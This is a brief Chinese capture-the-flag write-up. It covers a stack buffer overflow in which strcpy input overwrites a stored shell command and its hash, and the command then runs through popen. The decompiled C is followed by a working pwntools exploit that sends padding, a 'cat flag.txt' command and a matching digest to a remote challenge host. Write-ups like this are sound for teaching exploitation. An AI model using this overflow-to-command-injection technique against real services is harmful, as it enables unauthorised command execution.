一个简单的内存溢出覆盖的题,要求输入数据与md5值比较通过,然后执行预存的命令。这里输入数据有溢出,通过溢出覆盖到v14命令和v15的md5值。
__int64 __fastcall main(int a1, char **a2, char **a3)
{
char *v3; // rax
unsigned __int8 *v4; // rbp
char *v5; // rbx
__int64 v6; // rcx
char *v7; // rdi
unsigned int v8; // er12
FILE *v9; // rbp
size_t v11; // [rsp+0h] [rbp-308h] BYREF
char *lineptr; // [rsp+8h] [rbp-300h] BYREF
char dest[256]; // [rsp+10h] [rbp-2F8h] BYREF
char v14[27]; // [rsp+110h] [rbp-1F8h] BYREF
char v15[65]; // [rsp+12Bh] [rbp-1DDh] BYREF
_BYTE v16[32]; // [rsp+16Ch] [rbp-19Ch] BYREF
char v17[64]; // [rsp+18Ch] [rbp-17Ch] BYREF
int v18; // [rsp+1CCh] [rbp-13Ch] BYREF
char s[264]; // [rsp+1D0h] [rbp-138h] BYREF
unsigned __int64 v20; // [rsp+2D8h] [rbp-30h]
v20 = __readfsqword(0x28u);
sub_E60(dest);
v11 = 0LL;
lineptr = 0LL;
if ( getline(&lineptr, &v11, stdin) == -1 )
return 1;
v3 = strrchr(lineptr, 10); // dest:256, v14:cmd, v15:md5
if ( !v3 )
return 1;
*v3 = 0;
v4 = v16;
v5 = v17;
strcpy(dest, lineptr);
sub_DD0(dest, v16, 256LL);
do
{
v6 = *v4;
v7 = v5;
v5 += 2;
++v4;
snprintf(v7, 3uLL, "%02x", v6);
}
while ( v5 != (char *)&v18 );
v8 = strcmp(v15, v17);
if ( v8 )
{
puts("wrong password!");
return 1;
}
v9 = popen(v14, "r");
if ( !v9 )
return 1;
while ( fgets(s, 256, v9) )
printf("%s", s);
fclose(v9);
return v8;
}
exp:
from pwn import *
p = remote('111.200.241.244', 50769)
p.sendline(b'A'*256+b'/bin/cat flag.txt;'.ljust(27, b'#') + b'e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb')
p.interactive()